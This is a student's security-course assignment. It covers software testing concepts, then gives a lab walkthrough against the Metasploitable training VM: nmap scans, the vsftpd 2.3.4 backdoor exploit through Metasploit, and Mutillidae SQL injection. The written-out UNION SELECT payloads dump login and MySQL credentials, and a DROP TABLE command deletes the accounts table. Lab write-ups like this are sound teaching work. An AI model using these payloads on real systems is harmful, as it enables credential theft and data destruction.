FCS Assignment 3

Etash Tyagi
2019360
December 2021

1 Software Testing

1.1 Recoverability

• In the context of software, recoverability is the capability for re-establishing its level of
performance and recovering the data affected by any system failures or attacks.

• Data recovery can be ensured by storing data in secondary storages to prevent the complete
loss of data.

• For a chat application, messages can also be stored on the local device of the user (either
via browser cache or local storage), hence eliminating the use of storage altogether. In
this case after a failure, the worst thing that can happen is one message is not delivered
to the destination.

• If for some reason message must be stored on the database, RAID (redundant array of
independent disks) can be used to introduce redundancy, to make it easier to recover from
disk failure.

• Along with that data can also be stored in offline servers at multiple different machines
to be used in case of failure.

• While testing, it should be ensured that there is no problem in compatibility of backup

and current system, data gets correctly stored in the backup device, the data can be safely
recovered and interpreted (decryption).

• The hardware should also be tested to ensure minimal chance of complete failure.

1.2 Automatic Code Analysis

1.2.1 A

Automatic code analysis is a kind of code testing done by softwares which try to detect errors
and vulnerabilities and bring them to the developer’s attention. The types of code analysis and
their examples are:

1
 • Control Flow Analysis: Checks the order in which code is executed, finds unreachable
code, checks for loops with multiple entry and exit points.
Example: int main(){return -1; int x = -1;}

• Data Use Analysis: Detects variables, data stored in them, datatype validation, etc...
Detects errors like unused variables, variables written twice, usage of uninitialized vari-
ables, etc...
Example: int main(){int x; return x;}

• Interface Analysis: Checks if usage of a function is consistent with it’s usage.

Example: void x(){} int main(){int a = x(3);}

• Information Flow Analysis: Analyzes dependencies of output variables.

Example: int main(){if (x){return 1;}; int x;}

1.2.2 B

Intellij has been used to answer the question.

Code Analysis Type Sub-functionality Supported

Control Flow Analysis Unreachable Code YES
Control Flow Analysis Infinite Loop YES
Data Use Analysis Unused Variables YES
Data Use Analysis Data Type Validation YES
Interface Analysis Argument validation YES

Table 1: Intellij automatic code analysis

1.3 Regression Testing

Regression testing is done to find accidental changes in code via finding unwanted behaviour.
It is typically done after major changes in the code to find out unexpected bugs which might
arise as a result of the intended change.

1.3.1 Test Case For Unlocking Phone

• Phone must either stay locked when a call comes, or must lock after it is picked.

• Opening applications on the lock screen must not unlock the mobile.

• Opening applications on the lock screen (like camera) must not expose user data.

• The notification bar should have limited buttons, clicking on which does not unlock the
phone.

• There should be a way for user to enable/disable lock screen authentication.

2
1.3.2 Test Specific For Face Unlock

Following (in addition to above) are test cases for face unlock:

• Facial features used for recognition must be hashed or encrypted and not shared with any
one.

• Facial recognition should be able to detect when eyes of the individual is closed to prevent
unwarranted access.

• Make sure images captured for recognition are not cached, and hence do not bloat the
system.

• Make sure there is another way to unlock for the owner (eg: two factor authentication via
registered email) in case the front camera stops working.

• Make sure facial detection is working correctly.

1.3.3 What Test Cases Stay Relevant After Update

The test cases for unlocking the phone (1.3.1) still stay relevant (assuming face unlock is com-
pletely replaced). In addition to that following are few test cases for the new feature:

• Fingerprint used for recognition must be hashed or encrypted and not shared with any
one.

• Make sure there is another way to unlock for the owner (eg: two factor authentication via
registered email) in case the fingerprint recognition hardware stops working.

• Make sure fingerprint scanner is working correctly.

1.3.4 Regression Test Plan

• Perform assessment on code to gather insights about the changes.

• Identify acceptable levels of risk.

• Test case for unlocking phone.

• Previous functionality is no longer accessible.

• Test newly implemented functionality.

• Make sure features specific to previous functionality are no longer present for new one.

• Code analysis if a vulnerability is found.

3
 2 Metasploitable

Assumption:

• IP address of victim is known (192.168.1.21 local in this case.)

• This link was followed to fix errors.

Figure 1: Finding IP Of Victim

2.1 OS Version

2.1.1 Summary

1. How: Using linux command ’nmap -O {victim ip}’.

2. Why: -O option gives information about OS of the target machine.

3. Outcome: OS of victim is found as Linux 2.6.9 − 2.6.33.

2.1.2 Steps To Reproduce

1. Open terminal.

2. Install nmap if not already installed.

3. Use command ’nmap -O {victim ip}’

4. OS and kernel is listed under OS Details and OS CPE.

2.1.3 Result

Linux 2.6.9 - 2.6.33 is the OS, Kernel is linux 2.6.

4
 Figure 2: Nmap Find OS

2.2 Open Ports

2.2.1 Summary

1. How: Using linux command ’nmap -p- -sV {victim ip}’.

2. Why: -p- is used for all ports, -sV is used for service version (used in future).

3. Outcome: 30 open ports were recognised on the victim’s machine.

2.2.2 Steps To Reproduce

1. Open terminal.

2. Install nmap if not already installed.

3. Use command ’nmap -p- -sV {victim ip}’

4. Ports with STATE=open are open, with SERVICE running on it, with VERSION being
the application using these ports.

5
2.2.3 Result

Following are the open ports and services and versions on them:

Figure 3: Nmap Ports And Service Version

2.3 FTP Backdoor

2.3.1 Summary

1. How: Using Metasploit (linux command ’msfconsole’)

2. Why: metasploit is used to find and exploit vulnerable systems.

3. Outcome: File system was accessed.

2.3.2 Steps To Reproduce

1. Open terminal.

6
 2. Install msfconsole if not already installed.

3. Use command ’msfconsole’

4. Search for vulnerabilities in FTP using service version (search ”vsftpd 2.3.4”)

5. Use the backdoor (use exploit/unix/ftp/vsftpd 234 backdoor)

6. Set the victim (set RHOSTS {victim ip})

7. Start the attack (exploit)

8. Now we can see the file system using FTP

2.3.3 Result

Figure 4: Start Metasploit

Figure 5: Metasploit Find Backdoors

Figure 6: Metasploit Exploit Backdoor

7
2.4 Mutillidae add-to-your-blog.php

2.4.1 Summary

1. How: goto ’http://{victim ip}/mutillidae/?page=add-to-your-blog.php’, in the text-field

enter SQL injection.

2. Why: No SQL injection protection.

3. Outcome: Wrong date was put in blog entries, (multiple statements are disabled, this is
the biggest exploit possible here).

2.4.2 Steps to Reproduce

1. goto ’http://{victim ip}/mutillidae/?page=add-to-your-blog.php’

2. Enter ”’” in the text area to get SQL error.

3. Now enter the command ”SQL Injection’, ’-1’) #”.

4. There will be an entry in blogs with date ”0000-00-00”.

2.4.3 Results

Figure 7: SQL Error

8
 Figure 8: SQL Command

Figure 9: SQL Results

2.5 Mutillidae Credentials Leak

2.5.1 Summary

1. How: goto ’http://{victim ip}/mutillidae/index.php?page=user-info.php’, enter SQL in-

jections in username or password field.

2. Why: No SQL injection protection.

3. Outcome: Login and Database credentials were leaked.

2.5.2 Steps To Reproduce

1. goto ’http://{victim ip}/mutillidae/index.php?page=user-info.php’.

2. Enter ”’” in username and ”a” in password to get SQL error.

3. For Login credentials put command ”’ UNION SELECT * FROM accounts #” in user-
name and ”a” in password to get list of all login credentials (result in fig 10).

4. To get the database with database credentials follow the following:

5. Now enter command ”’ UNION SELECT 1, TABLE SCHEMA, TABLE NAME, 1, 1

FROM INFORMATION SCHEMA.TABLES #” in username and anything in password,

9
 to see list of all tables and their database.

6. The database credentials are generally found in mysql.user table, to find columns en-
ter following command in username : ”’ UNION SELECT 1, TABLE SCHEMA, TA-
BLE NAME, COLUMN NAME, 1 FROM INFORMATION SCHEMA.COLUMNS WHERE
TABLE NAME=’user’ AND TABLE SCHEMA=’mysql’ #” and ”a” in password to see
columns.

7. We find User, Password and Host columns are necessary to login to the database.

8. Finally to leak database credentials, enter ”’ UNION SELECT 1, User, Password, Host,
1 FROM mysql.user #” in username and ”a” in password.

9. To PURGE tables, go to php admin page (’http://{victim ip}/phpMyAdmin/’), login

with leaked credentials and enter sql command ”DROP TABLE accounts”, to delete all
account info.

2.5.3 Results

Following is the way to replicate the attack and the results found out:

Figure 10: SQL Website User Credentials

10
 Figure 11: SQL Error

Figure 12: SQL Find All Tables Command

Figure 13: SQL Find All Tables Result

11
Figure 14: SQL Get Columns Of User Table

Figure 15: SQL Get Database Credentials

Figure 16: My PHP Admin Login

12
Figure 17: Delete Table SQL Command

Figure 18: Delete Table SQL Result

13